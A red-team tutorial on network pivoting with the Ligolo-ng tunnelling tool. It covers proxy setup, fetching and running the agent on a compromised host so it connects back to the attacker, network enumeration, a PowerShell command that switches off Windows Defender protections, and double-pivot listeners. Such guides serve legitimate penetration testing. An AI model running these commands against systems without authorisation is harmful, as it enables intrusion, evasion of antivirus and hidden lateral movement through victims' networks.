Mastering Pivoting for Effective Lateral Movement

In the given network diagram, we can see four distinct networks: 192.168.0.0/24, 10.10.0.0/24, 172.16.0.0/24, and 200.10.0.0/24. The diagram illustrates how devices within these networks are interconnected and accessible to each other.

What is Pivoting?

Pivoting refers to the technique used by attackers to move deeper into a network after gaining initial access. It typically involves the use of a compromised system as a launchpad to access other parts of the network that are not directly reachable from the attacker’s position

There are many tools available for pivoting, each with its own strengths and weaknesses. However, for this guide, we are going to use Ligolo-ng due to its numerous advantages like Ease of Use, High Performance, Security, Reliability and Cross-Platform Compatibility.

What is Ligolo-ng?

Ligolo-ng is a next generation tunneling tool for reverse tunneling. It is useful for Penetration Testers and Red Teamers. It is an advanced and easy to use tool that uses TUN Interfaces instead of traditional SOCKS proxies.

How does Ligolo-ng Works?

Ligolo-ng solves the problem of accessing internal networks by using a compromised dual-homed system as a pivot point. It allows us to establish tunnels from a secure reverse connection that move laterally within a network and access otherwise unreachable systems.

How to Set Up Ligolo-ng?

We will compromise a machine inside the external network, which will serve as the “Agent.” The attacker machine, usually the Kali Linux system — will be the “Proxy” server.

Download Agent for Linux:

sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

Download Agent for Windows:

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Windows_64bit.zip

Download Proxy for Attacker:

sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

There are some prerequisite commands we need to run before launching the Ligolo-ng proxy server.

sudo ip tuntap add user [your_username] mode tun ligolo

sudo ip link set ligolo up

These commands create a tun interface on the Proxy Server (C2). This virtual interface handles the routing of packets to and from the internal network through the agent.

On the attacker machine get ligolo running:-

./lin-proxy -selfcert -laddr 0.0.0.0:443

Run these commands on the target Machine:

wget http://<your attacker machine IP here>/lin-agent

chmod +x lin-agent

./lin-agent -connect <attacker IP here>:443 -ignore-cert

You should see the connection get grabbed by Ligolo-ng.

Enumerate the Network on Linux

Run the following commands to discover other networks the machine is interacting with:

netstat -an

ip route

ifconfig

Enumerate the Network on Windows

netstat -an | findstr "192.168.”

#Disable Antivirus
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true

Now that you know where to go next on the network, let’s set up the tools to explore that area and see what else we can find.

On Attacker machine run:

sudo ip route add {10.10.0.0/24} dev ligolo

Now the Proxy server will route the traffic through the TUN interface to the Agent, which then forwards it to the internal network. This will allow us to interact with the internal network as if directly connected.

Adding More Agents to The Jump Host

To double pivot with Ligolo-ng, we need to add a listener on port 11000 to our existing Ligolo-ng session which will redirect it to our attacker machine port.

listener_add --addr 0.0.0.0:11000 --to 127.0.0.1:11601 --tcp
listener_add --addr 0.0.0.0:11001 --to 127.0.0.1:11601 --tcp
listener_add --addr 0.0.0.0:11002 --to 127.0.0.1:11601 --tcp

#To Show the Active Listeners
listener_list

#To Delete an Active Listener
listener_stop {ID}

As a result, we can use the agent on the recently compromised host to connect back to Ligolo-ng and establish a new session from another host.

Accessing the Jump Box

To access the jump box using Ligolo-ng, we can add a special route and use a dedicated IP address created by Ligolo-ng. Ligolo-ng uses the IP address 240.0.0.1 to facilitate easy access to the local ports of the connected remote agent.

Ligolo-ng reserves the IP address 240.0.0.1 to automatically redirect traffic to the agent’s local IP address (127.0.0.1). When we send traffic to 240.0.0.1, Ligolo-ng redirects it to the agent’s local IP, allowing you to interact with services running on it.

The only step required to access the first pivot box is adding a route to the subnet 240.0.0.1/32.

sudo ip route add 240.0.0.1/32 dev ligolo

Now, anytime we want to interact with the jumphost, we can use the IP of 240.0.0.1